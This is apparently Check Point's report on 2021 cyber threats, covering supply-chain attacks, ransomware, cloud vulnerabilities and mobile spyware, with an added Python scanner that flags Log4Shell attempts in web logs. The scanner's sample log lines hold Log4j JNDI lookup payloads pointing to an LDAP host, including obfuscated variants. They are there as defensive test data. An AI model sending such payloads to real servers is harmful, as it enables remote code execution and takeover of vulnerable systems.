2021’S CYBER SECURITY TRENDS
The infamous SolarWinds supply chain attack was revealed in December 2020, but its influence on the cloud attack landscape, with particular regard to supply chain attacks, has led to its inclusion in our report once again. The SolarWinds incident originated with a sophisticated malware, Sunburst, incorporated into several compromised versions of an IT resource management product named SolarWinds Orion, used by 33,000 customers worldwide. The malicious update, attributed to the Russian Intelligence agency-affiliated threat group called ‘Nobelium’, found its way to around 18,000 corporations, infecting organizations such as US government departments including the Department of Homeland Security and the Treasury Department.
As detailed in our previous report, beyond its unprecedented scale, SolarWinds' main innovation lies in its technique. In order to gain access to an organization's sensitive Microsoft 365 resources, the attackers first used a forged token to compromise the local and on-premise networks, before moving laterally to the cloud environment. Today, we can clearly state that the SolarWinds attack laid the foundations for a rapid surge in supply chain attacks.
Throughout 2021, software supply chain attacks grew in both frequency and scale. Researchers concluded that software supply-chain attacks increased by no less than 650% throughout the year. A study issued by the European Union Agency for Cybersecurity (ENISA) reviewed two dozen incidents and found that 66% of supply chain attacks were committed by exploiting an unknown vulnerability, while only 16% leveraged known software flaws. Most attacks actually targeted software code. This year, it seems that organizations were once again caught largely unprepared: a survey concluded that 82% of companies grant the third-party vendors that make up their software supply chain highly privileged roles, 76% grant roles that could allow account takeover, and, worst of all, over 90% of the security teams responsible were not aware that such permissions had even been granted.
Naturally, prominent APT groups are an integral part of the trend. The North Korean Lazarus group recently began targeting IT service providers to launch supply chain attacks, and a new backdoor called BLINDINGCAN has already been used to target a Latvian IT vendor and a South Korean software company. Additional incidents include an attack against a CCTV vendor carried out by an affiliate of the DarkSide ransomware gang, in which the actors compromised the vendor's website to infect its clients with ransomware.
One of the most significant supply chain attacks of 2021, also featuring ransomware delivery, targeted Kaseya, a global provider of IT management software for managed service providers (MSPs) and IT teams. The attack was carried out by a member of the affiliate program of the REvil ransomware group. According to the Kaseya CEO, less than 0.1% of the company's customers were accessed, but as some of Kaseya's clients are MSPs themselves, as many as 1,500 companies were affected by the attack. The threat actors cleverly exploited a vulnerability affecting Kaseya's internet-facing VSA servers. VSA is a remote-monitoring tool commonly used by MSPs for the management of network and endpoint devices. When the attack was discovered by Kaseya, the company urged its customers to shut down their VSA servers.
In late October, the popular NPM package 'ua-parser-js', with millions of weekly downloads, was compromised by attackers. For a period of four hours, the actors managed to take over the developer's NPM account and inserted malicious code into three versions of the NPM library. The library, which is used to parse user agent strings and identify its browser, operating system, CPU and more, is used in thousands of projects, including ones owned by Facebook, Microsoft, Amazon, Google and Slack. Therefore, the supply chain attack, in which compromised packages of the library were distributed instead of the legitimate one, enabled threat actors to install malware on a large number of infected devices. In this case, Linux and Windows devices were infected with crypto-miners and password-stealers.
Another prominent incident took place in November, when multiple Greek shipping companies were hit by ransomware. This was after a common IT service provider, Danaos Management Consultants, was compromised in a supply chain attack. The incident crippled the shipping companies' communication channels, interrupting contact with other ships, suppliers, and agents, and also led to data loss.
This year, the group behind the SolarWinds attack itself resumed activity, utilizing the approach developed for the first attack and focusing yet again on companies that are part of the global IT supply chain. However, this time, a different part of the chain is being targeted, namely cloud resellers and tech service providers. These companies customize, implement, and manage cloud services for their customers. The threat group clearly relies on these companies' direct access to their clients' environments to obtain access to their full client lists in a single strike, impersonating a trusted partner. The operation has been taking place since May 2021 and has already impacted more than 140 resellers and providers, compromising 14 of them. Throughout the second half of the year, the 'Nobelium' threat group has been highly active, but with a lower success rate due to growing awareness. The group utilizes multiple tactics, including the use of stolen credentials obtained via an info-stealer campaign by a third-party actor, leveraging application impersonation privileges to collect protected mail data, and abusing multi-factor authentication (MFA). The recent attack wave may signal a growth in the resources invested by the Russian state-sponsored group in the field of supply chain operations, as a means to establish persistent access to targets of interest to the Russian government.
Just when we thought we had finished summarizing the Supply Chain landscape for 2021, the Log4j zero-day vulnerability was exposed. The Apache logging package Log4j is the most popular Java logging library with over 400,000 daily downloads, and is incorporated into millions of Java-based applications worldwide. Companies using Log4j as a logging package include Cisco, Twitter, Cloudflare, Tesla, Amazon, Apple and more. The Log4j package logs error messages; according to the Apache Foundation advisory, an attacker who can control log messages or their parameters could execute arbitrary code from an external server via multiple protocols when message lookup substitution is enabled. Only a single string of text is needed to exploit the flaw.
Since its discovery on December 9, the ‘Log4Shell’ flaw has been actively exploited in the wild. The vulnerability, assigned CVE-2021-44228, could allow an unauthenticated attacker to execute malicious code on, or take over, any system that uses a vulnerable version of the open-source library. Unsurprisingly, it scored a perfect 10 out of 10 in the CVSS rating system. Due to the scale of the distribution of the library, Log4Shell is referred to as the most critical vulnerability of 2021, with the full scope of the damage yet to be determined. The Apache Foundation released a patch for the RCE vulnerability, but nevertheless, mass scanning for vulnerable servers has been observed by multiple security vendors. The exploit rate of the Log4j flaw has been unusually high since shortly after its exposure. Check Point Research detected approximately 40,000 attack attempts 2 hours after the Log4j vulnerability was revealed and 830,000 attack attempts 72 hours into the event.
The vulnerability could potentially allow threat actors to access any system using the library, including systems that are used to manage client networks and resources. The potential damage that could be caused by this one vulnerability in an open source library demonstrates the immense risk posed by software supply chains, especially in cases where an underfunded project, run by several part-time volunteers, is a key component that thousands of multi-million computer systems rely on worldwide.
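The defender's side of the "single string of text" described above, as an added example that is not part of the Check Point report: a small Python scanner that reads web-server log lines, undoes the lower/upper/default-value lookup nesting and URL-encoding commonly used to hide the JNDI lookup, and flags lines that carry one. The log lines are constructed samples and 203.0.113.0/24 is a documentation address range; the normalizer covers only the nesting forms listed in the comments, not every possible encoding.

```python
import re
from urllib.parse import unquote

# Innermost Log4j-style lookup: "${...}" with no nested "${" or "}" inside.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Placeholder characters that park a lookup we do not evaluate (jndi, env,
# java, ...) so that the substitution loop terminates; restored at the end.
_OPEN, _CLOSE = "\x01", "\x02"


def _resolve(content: str):
    """Evaluate the few lookups that are nested to hide the string 'jndi:'.

    Returns the substituted text, or None for a lookup we leave in place.
    """
    low = content.lower()
    if low.startswith("lower:"):
        return content[6:].lower()
    if low.startswith("upper:"):
        return content[6:].upper()
    # "${name:-default}" yields 'default' when 'name' is undefined; the
    # empty form "${::-j}" is used as a one-character building block.
    if ":-" in content:
        return content.split(":-", 1)[1]
    return None


def normalize_lookups(text: str) -> str:
    """Collapse nested lower/upper/default lookups, innermost first."""
    text = unquote(text)  # undo one layer of URL-encoding (%24%7B -> ${)

    def repl(match):
        resolved = _resolve(match.group(1))
        if resolved is None:
            return _OPEN + match.group(1) + _CLOSE
        return resolved

    while True:
        new_text = _INNERMOST.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text.replace(_OPEN, "${").replace(_CLOSE, "}")


def find_jndi_lookup(line: str):
    """Return the normalized JNDI lookup found in a log line, or None."""
    normalized = normalize_lookups(line)
    match = re.search(r"\$\{jndi:[^}]*\}?", normalized, re.IGNORECASE)
    return match.group(0) if match else None


def scan_log(lines):
    """Return (line_number, lookup) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = find_jndi_lookup(line)
        if found:
            hits.append((number, found))
    return hits


# Constructed sample access-log lines (common log format with User-Agent);
# lines 2-5 carry a lookup in different disguises, lines 1 and 6 are benign.
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [10/Dec/2021:08:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:08:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:08:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.13 - - [10/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.5/a}"',
    '203.0.113.14 - - [10/Dec/2021:08:01:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '203.0.113.15 - - [10/Dec/2021:08:01:20 +0000] "GET /?path=${env:HOME} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, lookup in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: {lookup}")
```

Matching on the normalized form rather than the raw line is what makes lines 3 to 5 visible; a naive search for the literal `${jndi:` would report only line 2.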
It’s no secret that a cyberattack, whether targeted or widely distributed, can have a dramatic impact on organizational performance, data integrity, customer success, long-term reputation and, of course, finances. Naturally, attacks targeting critical infrastructure can paralyze an organization’s routine as well as its entire supply chain. In 2021, we witnessed an unusually high number of attacks that led to disruptions to individuals’ day-to-day lives, and in some cases even threatened their sense of physical security. Whether they are financially or ideologically driven, threat actors are constantly looking for additional leverage and new ways to increase the pressure placed on their victims.
One of this year’s most significant attacks, which perfectly demonstrates the above, is a ransomware incident that took place in May. The operation targeted the Colonial Pipeline fuel company which delivers fuel to the Southeast coast of the United States. The incident forced the company to shut down their operations, increasing gasoline prices and causing a major supply shortage on the East Coast. This chain of events eventually triggered a rush of panic buying as many gas stations completely ran out of fuel. Government officials pleaded with the public not to rush to gas stations, as people were actually attempting to fill plastic bags with gasoline to avoid running out. A single day after the attack took place, Colonial Pipeline had no choice but to pay the USD$5 million ransom to the DarkSide ransomware gang who led the attack in order to unlock their systems.
In the same month, JBS S.A, the world's largest meat processing company, fell victim to an attack by the REvil ransomware group. The Brazilian company distributes meat products made in 150 industrial plants in 15 countries, and has approximately 150,000 employees worldwide. The attack that hit the company network impacted slaughterhouses and meat supplies in the US, Canada and Australia and caused more than 3000 workers’ shifts to be canceled. All of its US beef plants and meat packing facilities, responsible for almost a quarter of American meat supplies, ceased production while The White House assigned the FBI to investigate. In Australia, some abattoirs were completely shut down, forcing the company to furlough 7,000 employees. Eventually, with the fear of price inflation combined with massive unemployment, the CEO of JBS USA, a subsidiary of JBS S.A., announced that the company paid the cybercriminals a ransom equivalent to $11 million in BTC.
The education sector was also heavily impacted. In 2021, it was the most targeted sector globally, with a 75% increase compared to 2020 and an average of almost 1,605 attack attempts per organization per week. The disruption suffered by educational institutions impacted students, professors and other staff members. Howard University in Washington D.C. fell victim to a ransomware attack in September and was forced to suspend classes to conduct a thorough investigation of its network together with an audit of student and staff devices. Similarly, Lewis and Clark Community College in Illinois was hit by a ransomware attack in November that affected its online learning platform as well as other critical systems. It had to close all its campuses and cancel extra-curricular activities, including sporting events taking place in its facilities. The FBI released an alert about the PYSA ransomware, which targets higher education institutions in the US and the UK. Finally, in mid-2021, the Grief ransomware attacked several school districts in the US, among them a school district in Mississippi. The ransomware operators stole 10GB of data including personal and professional information, and threatened to publish the data unless they were paid. Institutions of higher learning such as universities and colleges make good targets for cyber-criminals because their systems, which allow students and faculty to connect their personal devices to the institution’s network, aren’t fully protected.
The healthcare sector has also been heavily targeted by cybercriminals since the start of the pandemic, as hospitals, research facilities involved in the development of vaccines, and pharmaceutical companies all prove tempting targets due to the time-sensitive nature of their work. In October, a devastating ransomware attack took place against the health care system of Newfoundland and Labrador, Canada. As a result, employee and patient data was stolen and key systems were taken down for more than a week, leading to a delay in thousands of appointments, including chemotherapy, as almost all non-emergency services and procedures were canceled within the province. That same month, we witnessed one of the first ransomware attacks against a hospital in the Middle East, as the Chinese group DeepBlueMagic targeted the Hillel Yaffe Medical Center in Hadera, Israel, with a custom ransomware. The attack incapacitated computers and some of the hospital infrastructure, making discharging and processing patients impossible due to the inability to retrieve patient files and register new ones. In December, the Behavioral Health Group (BHG), which maintains over 80 Opioid treatment clinics throughout the US, suffered a cyber-attack that disrupted its network for a week. In some centers, patients were prevented from getting their prescribed take-home dosage of medicine to treat narcotic addiction as the computers were not available to print prescription labels, potentially harming their sensitive anti-addiction treatment.
Ideologically driven hackers also managed to cause public disruption, particularly in Iran. First, the Iranian railways infrastructure faced a cyber attack back in July in which hackers displayed messages about train delays or cancellations on information boards at stations across the country, urging passengers to call a number (which belonged to the office of the Iranian Supreme Leader, Ayatollah Khamenei) for more information. The attack severely disrupted train operations the same day and spread fear and confusion among the public. Check Point Research investigated and attributed the attack to the Indra group, which opposes the regime, has been active since at least 2019, and is known for its use of wiper malware.
In October, a massive cyber-attack disrupted 4,300 Iranian gas stations, targeting the electronic card system which allows people to buy gas with government subsidies. On the screen, consumers who tried to fill their tank found the notice “cyberattack 64411”, Iran’s Supreme Leader’s phone number (the same one exposed in the train attack). The incident caused a great deal of disorder, with long lines of people at gas stations fearing shortages and sudden price increases.
All of the attacks described above had a substantial impact on a particular target sector and region. They also gained a lot of media attention, which naturally plays right into the hands of cybercriminals in their attempts to plant fear and gain leverage over their victims. Unfortunately, as 2021 has demonstrated, cyber attacks often have a much wider effect on the general population than the original attacks may have even intended.
In 2020, the global pandemic brought significant changes to the corporate work environment as well as corporate network architecture. Within those changes, both the shift to cloud-based architecture, meant to address the need for hybrid, remotely managed networks, and the preference for as-a-service providers over traditional suppliers have really stood out in terms of the scale of their adoption. Subsequently, in 2021, it became clear that cloud environments were also growing in popularity among end users. By mid-year, Gartner had released its forecast stating that end-user spending on public cloud services was estimated to grow by 23% in 2021 to over US$ 332 billion, compared to US$ 270 billion in 2020 and US$ 242.7 billion in 2019. Enterprises are now allocating large-scale funds to multi-cloud architectures, with Microsoft Azure and AWS leading in popularity, and Google Cloud Platform, IBM, VMWare and others holding a respectable share of the market.
Naturally, organizations are becoming increasingly dependent on cloud vendors to securely manage their databases, proprietary code, and organizational resources. These organizations are now gradually filling in the platform and role management knowledge gaps formed during the rapid shift to cloud-based environments during 2020, leading to better security and more comprehensive administration. IAM (Identity and Access Management) Role Assumption attacks, aimed at elevating privileges after obtaining unauthorized access, however, continue to be a significant concern.
As usual, threat actors continue to race against the security research community, looking for new vulnerabilities and exploits. Since late 2021, we have witnessed a wave of attacks leveraging flaws in the services of industry-leading cloud service providers to gain control over an organization’s cloud infrastructure, or, potentially, the organization’s entire database which stores proprietary, customer and financial information. The flaws under discussion are not trust logic flaws – permission-based flaws that derive from the organization’s role policy that are used by threat actors to gradually escalate privileges within the environment. Instead, we’re dealing with critical vulnerabilities in the cloud infrastructure itself, which can allow full takeover of accounts or arbitrary code execution.
The trend is led by the infamous OMIGOD flaw attacks. In September, researchers found four critical vulnerabilities in OMI (Open Management Infrastructure), one of Microsoft Azure’s software agents that allows users to manage configurations across remote and local environments. OMI is deployed on Azure Linux VMs, is embedded into multiple Azure services, and is installed automatically when some services are enabled, which makes these flaws highly likely to be exploited. An estimated 65% of all Azure customers are vulnerable, which translates to thousands of organizations and millions of end-point devices. OMIGOD flaws are easy to exploit, as only a single request with the authentication header removed is needed. Together, the vulnerabilities could enable actors to execute remote arbitrary code within a vulnerable network and escalate to root privileges.
Microsoft already issued a patch to address the flaws as part of its September 2021 release. However, some researchers warned that the company’s automatic fix was ineffective for several days, until it was repaired. Attacks leveraging these flaws, in particular the 9.8-rated RCE flaw, assigned CVE-2021-38647, have been observed since the time of exposure and have increased rapidly ever since. Servers scanning for vulnerable devices spiked from around 10 to more than 100 during the first weekend alone. The notorious Mirai IoT (Internet-of-Things) botnet was one of the first to target vulnerable devices, and the malware attempted to close port 5896 (the OMI SSL port) to keep other actors from taking advantage of the attack. Attacks aiming to deploy crypto miners onto unpatched Linux devices were also observed.
Another alarming flaw in Microsoft Azure was exposed a month earlier, in August. This time, the vulnerability, dubbed ‘ChaosDB’, was found in Azure Cosmos DB, a multi-model NoSQL database used by some of the top global businesses out there, such as Coca Cola, Skype, and Symantec, to manage large-scale databases including financial transaction information. The flaw enables an actor to retrieve several internal keys used to obtain root privileges that eventually enable it to manage the organization’s databases and accounts. Simply put, by exploiting this flaw, attackers can gain complete and unrestricted control of the entire cloud resources of all Azure Cosmos DB clients.
Yet another breach in Microsoft Azure was discovered towards the end of the year. The flaw, called ‘Azurescape’, affects Azure’s Container-as-a-Service (CaaS) platform and relies on a two-year-old vulnerability assigned CVE-2019-5736 in RunC, a container runtime. Uniquely, Azurescape is a cross-account vulnerability: it allows an attacker to break out of the breached environment and execute code on environments belonging to other users in the same public cloud service. This means that a malicious user of the Azure Container Instances (ACI) could potentially run arbitrary code on other clients’ Kubernetes clusters. Exploitation of the flaw consists of three stages, beginning with container escape, which is a privilege escalation technique for container environments. Azurescape enables an attacker to gain administrative privileges over an entire cluster of containers. Thankfully, a patch was swiftly released when the flaw was first exposed, but further action by ACI users is also required. As of late 2021, no exploits were detected. The flaw, however, has raised awareness to the dangers posed by multi-tenant cloud environments, common large-scale infrastructures that host multiple organizations on a single platform.
Microsoft Azure is not the only service in which security flaws were discovered in the past year. In June, researchers uncovered a vulnerability in Google's Compute Engine (GCE), an infrastructure-as-a-service (IaaS) component of Google Cloud Platform which is used to create and launch virtual machines on demand. The flaw enables an attacker to take over virtual machines due to a combination of factors, including the use of weak random numbers by the ISC DHCP software. Exploitation of the flaw, achieved by impersonating the Metadata server from the targeted VM's point of view, could allow actors to eventually login as the root user of the VM. Google issued a patch for the flaw almost a year after it was first disclosed.
Recent research also provides an in-depth review of a technique called HTTP header smuggling and its potential use to attack AWS’s API Gateway and AWS Cognito, an authentication provider. The research demonstrates how this technique could be leveraged to bypass restrictions and achieve cache poisoning.
Finally, in late 2021 researchers noticed a peculiar change in AWS permissions that could allow AWS support services to read a customer’s S3 bucket data, instead of just observing its metadata. This potential privacy flaw was made possible by a change to the permissions of a mandatory role called ‘AWSServiceRoleForSupport’, created to allow technical and administrative support. Eventually, the change was reverted and AWS stated that they will implement additional safeguards to prevent such misconfigurations in the future.
To conclude, in 2021 cloud provider vulnerabilities became much more alarming than they were previously. The vulnerabilities exposed throughout the year allowed attackers, for timeframes of varying length, to execute arbitrary code, escalate to root privileges, access mass amounts of private content and even cross between different environments. In short, vulnerabilities in the cloud infrastructure itself have been exposed that even the most vigilant and professional cloud consumer could not have foreseen or prevented.
Throughout 2021, threat actors gradually increased their focus on mobile devices, for both large-scale end user campaigns and targeted enterprise attacks. A survey-based study revealed that implementation of the ‘BYOD’ (Bring-Your-Own-Device) policy in the workplace, in which employees replace designated corporate devices with their own personal devices, caught organizations unprepared, with approximately 49% of surveyed organizations indicating that they are unable to detect an attack or incident on employee-owned devices.
We must first address the developments around NSO’s Pegasus, one of the most notorious mobile malware families. Pegasus is a mobile spyware capable of infecting both iOS and Android devices, and was developed and marketed by the Israel-based NSO Group. The spyware can gain full control of a mobile device and harvest a multitude of data types such as messages, photos, calendars, emails and more. Additionally, the malware is capable of activating the camera, collecting images, as well as recording surrounding conversations. Pegasus’ infection is based on an elaborate zero-click exploit. Though the malware was first discovered in 2016, in 2019 it was revealed that the spyware leveraged the WhatsApp service to infect over 1,400 users, the targets of multiple NSO customers.
In July 2021, a vast collection of news outlets reported that the tool had been used to gain access to mobile devices of government officials, journalists, human rights activists and business executives worldwide. A list containing around 50,000 potential Pegasus victims was leaked and made headlines, possibly shedding light on NSO’s customers. The media attention led to extensive research in an effort to uncover Pegasus’ infection methods and help users detect Pegasus on their devices. Eventually, in September, Apple issued patches for two zero-day vulnerabilities in iMessage leveraged by Pegasus, assigned CVE-2021-30860 and CVE-2021-30858. These flaws exploit iPhones and Macs by allowing malicious documents to execute commands. In November, Apple filed a suit against NSO for using their hacking software on Apple devices and stealing private data. Naturally, the threat actors quickly tailored an extortion scam based on the scandal. A recent campaign leverages the public fear of Pegasus iOS spyware, seeking to intimidate potential victims by spreading emails containing ransom demands and claiming to have private videos of the victims, allegedly taken by the Pegasus malware.
Pegasus stands out due to its seamless, zero-click infection process, controversial victim list and sophisticated data exfiltration features. It is therefore not surprising that it is no longer the only one of its kind. Toward the end of the year, researchers exposed an additional threat actor in the private sector mobile spyware arena. Cytrox, a company based in North Macedonia, markets a spyware called Predator for iPhone devices, which infects the customer’s targets via single-click links sent over WhatsApp. As more and more information about the malware capabilities is exposed, the greater the chance that these will be adopted by common threat actors and groups. In addition, the wide distribution of mobile spyware and the attention this field has attracted in 2021 are yet further indications of the crucial role mobile devices play in the cyber threat landscape.
Throughout the year, we observed threat actors investing substantial efforts in hacking top social media accounts such as Facebook and Telegram. These efforts included the execution of large-scale attack campaigns aimed at obtaining access to mobile devices. In August, a new Android Trojan called ‘FlyTrap’ was found to have compromised at least 10,000 Facebook accounts across 144 countries since March 2021, predominantly through malicious applications available on the Google Play Store. The applications were uploaded and quickly removed from the platform but were later available on third-party app stores. Attackers also leveraged WhatsApp to distribute a modified version of the app for Android devices that installs the “Triada” Trojan. In October, researchers found a photo editing application offered on the Google Play Store which contained malicious code that collected users’ Facebook credentials and used them to run ad campaigns with the victim’s payment information. The app was downloaded by thousands of users. Finally, in November, a new Android malware called ‘MasterFred’ rose to prominence due to its use of fake login overlays to steal credit card information from Netflix, Instagram and Twitter users.
Another significant attack vector that was prominent in 2021 relies on SMS messages for malware distribution. SMiShing, short for SMS phishing, is a phishing technique that relies on mobile devices for social engineering distribution, and uses SMS messages as the attack vector. The FluBot Android botnet, which relies on this technique, resumed its activities in April 2021 despite arrests by the Spanish police. In September, the botnet added to its arsenal a new method to compromise Android devices, and began spreading a fake security update message warning of a FluBot infection. The infection is triggered once the victim clicks on the ‘install security update’ button. FluBot appeared again in November in a campaign targeting Finnish users. After the attack vector demonstrated its efficiency in FluBot’s campaigns, SMiShing has been gradually adopted by low-skilled actors. For example, a recent investigation conducted by Check Point Research indicated that SMiShing attacks are very effective in Iran, despite the generally low quality of the actors’ toolsets. These campaigns utilize SMiShing while also impersonating key entities such as the Iranian government, the judiciary system, shopping portals and more. Many warnings about this now thriving attack method appeared in news outlets. The scale of the recent attack wave is unprecedented, which comes as no surprise if you inspect the flourishing botnet-as-a-service market operating in underground forums and Telegram channels. Phishing kits are available for prices ranging from US$50 to US$100. We estimate that similar campaigns, also inspired by FluBot’s successful use of SMiShing, might soon appear in other countries as well.
Another extensive scam that took place in 2021 revolving around SMS messages is ‘UltimaSMS’, a massive campaign that utilizes around 150 Android applications. With more than 10 million downloads from the Google Play Store, its trick is to lure victims into subscribing to premium SMS services without their knowledge.
Finally, systematic changes caused by the global pandemic are also affecting the mobile banking malware arena. The expanding digitization of the banking sector in 2021 led to the surfacing of various applications designed to limit offline interactions, which in turn have led to the distribution of new threats. In September, Check Point Research uncovered a new attack method against Android users that abuses the device’s accessibility services. The attack targeted users of PIX, a year-old, yet extremely popular, instant payment solution created and managed by the Brazilian Central Bank. The campaign featured two variants of banking malware distributed by two malicious applications on the Google Play Store. The more unique one, called PixStealer, abused Android’s Accessibility Services (AAS) to steal money from a specific bank through PIX transactions. This minimalistic yet innovative combination of functions allows the malware to collect funds without interacting with a C&C, helping it to remain undetected. Due to its simplicity and efficiency, we can expect other threat actors to follow this lead.
Gone are the days when ransomware operators negotiated a ransom of US$200 for your family photos. Today’s ransomware economy is a complex operation extorting millions of dollars per ransom, holding entire organizations captive under the threat of total system shutdown. The evolution of the ransomware business model is at the core of this phenomenon. Ransomware-as-a-Service (RaaS) introduces affiliate programs at low onboarding costs, enabling any attacker to easily join the trend. The attacker selects one of the leading ransomware “projects” and follows the detailed, easy to follow complimentary operations manual, which contains complete instructions for every stage of the attack. If the intrusion was successful, the ransomware operators and affiliates share a percentage of the victim’s ransom payment. This extremely profitable scheme allows attackers to reach a wider range of victims and offers higher returns to all involved.
The ransomware operators are the backbone of the whole operation, offering not just the ransomware itself but also money laundering services and negotiation specialists. The different ransomware programs compete for affiliates, so ransomware groups are constantly developing more attractive tools and services for their affiliate programs in order to stand out in a competitive underground community. Reputation is a key motivating factor: it influences a group’s chances of earning big returns, while too much notoriety can draw the attention of the authorities. It is therefore not surprising that cybercriminals settle their internal disputes in tribunal forums, where losing a case can cost a group its reputation and profits.
This was a turbulent year for several ransomware groups, not least because governments and law enforcement agencies changed their stance towards organized threat actors. They moved from preventive and reactive measures to proactive offensive operations targeting the ransomware operators themselves, as well as their funds and supporting infrastructure. The major shift followed the Colonial Pipeline incident in May, where a DarkSide ransomware attack resulted in a major fuel shortage along the US East Coast, prompting the Biden administration to step up its efforts against the threat.
Later that month, the DarkSide gang announced they were shutting down operations after their servers were seized and the cryptocurrency funds used to pay affiliates of their Ransomware-as-a-Service program were stolen. In June, the US Department of Justice (DOJ) upgraded ransomware to a national security threat, placing it at the same priority level as terrorism. The next major incident was the Kaseya MSP platform breach in July, after which the REvil perpetrators mysteriously disappeared, taking their leak site “Happy Blog” offline and apparently shutting down their customer support. The shutdown was short-lived, however, and the group resurfaced in September, only to disappear again in October after a suspected law enforcement operation hijacked their infrastructure, including “Happy Blog”.
In September, the Biden administration took its war against ransomware a step further and announced it would begin sanctioning crypto exchanges, wallets and traders that ransomware threat actors use to convert ransom payments into spendable funds. The Russia-based SUEX exchange was the first to be added to the sanctions list for its part in ransom transactions. The next month, the European Union and 31 additional countries announced they would join the effort to disrupt further cryptocurrency channels, in an attempt to cripple the money laundering process. In addition, the Australian Government issued its “Ransomware Action Plan”, which includes the formation of a new special task force and harsher punishments for ransomware actors.
In November, an international joint operation led by Interpol, named “Operation Cyclone”, resulted in infrastructure seizures and the arrest of money laundering affiliates of Cl0p, the group responsible for the Accellion breach, which was the source of numerous double and triple extortions. In addition, the US DOJ and other federal agencies pursued further actions against REvil, including the arrest of members, the seizure of US$6 million in ransom money, the confiscation of devices and a bounty program worth US$10 million.
The reaction to these developments varied widely within the ransomware ecosystem. Some groups responded with hostility and applied even more pressure on their victims to keep the authorities away from their business. For example, Grief ransomware threatened to delete victims’ decryption keys outright should they hire professional negotiators. Similarly, RagnarLocker published all of the content stolen from victims that contacted the FBI or other law enforcement agencies.
Other groups appear to have concentrated on adapting and rebranding themselves to avoid being too closely associated with a prominent attack. DarkSide, for example, temporarily exited the ransomware arena, and at least some of its members rebranded as BlackMatter in July. They carried out attacks against the marketing service provider Marketron, the Japanese technology company Olympus, and critical infrastructure such as the NEW Cooperative farmers’ organization in Iowa. This rebranded operation was short-lived, however: in November, BlackMatter announced it was shutting down due to pressure from the authorities, stating that team members were “no longer available after the latest news”. Experts believe the exit was actually the result of trust issues with affiliates caused by flawed encryption, which had allowed a security company to decrypt victims’ files. In a final testament to underground cooperation, BlackMatter partnered with the LockBit ransomware group and transferred its victims to the LockBit platform, so that the extortion could continue seamlessly after BlackMatter vanished.
Not all ransomware groups exhibited this harmonious cooperation, however. The fear of being apprehended by the authorities was compounded by marked distrust fueled by constant competition. For example, REvil operators were caught cheating their affiliates by hijacking the ransom negotiation process, using duplicate chats and backdoors to cut the affiliates out of their share. The Conti group experienced an internal crisis after a disgruntled affiliate, complaining of low pay, leaked Conti’s playbook.
Finally, this past year we also saw signs of the ransomware community cracking under pressure or even closing shop altogether, with some operators abandoning their businesses entirely. For instance, the Avaddon cybercrime gang first appeared in June 2020, but only a year later was compelled to shut down and release its decryption keys, undoubtedly because of the increased scrutiny from law enforcement. In another instance, Conti ransomware targeted the British jeweler Graff, but later issued an apology after realizing that some of the stolen data belonged to the Saudi, UAE and Qatari royal families; fearing retaliation, the group promised to delete the data without reviewing it. Major cybercrime forums banned all ransomware advertising from their platforms to avoid drawing attention, which made it harder for operators to communicate with affiliates and added to their risk of being caught.
Proactive measures and offensive operations by governments worldwide have managed to put a noticeable dent in the ransomware ecosystem, disrupting ransomware operations and causing havoc in the underground scene. Despite this, millions of dollars in potential revenue mean that we will likely see more ransomware “projects” emerging in 2022, with the successful ones serving as a model for new and improved attacks. One lesson ransomware operators may draw from the events of 2021 is that their choice of targets can be the difference between a long-running operation and a very short one.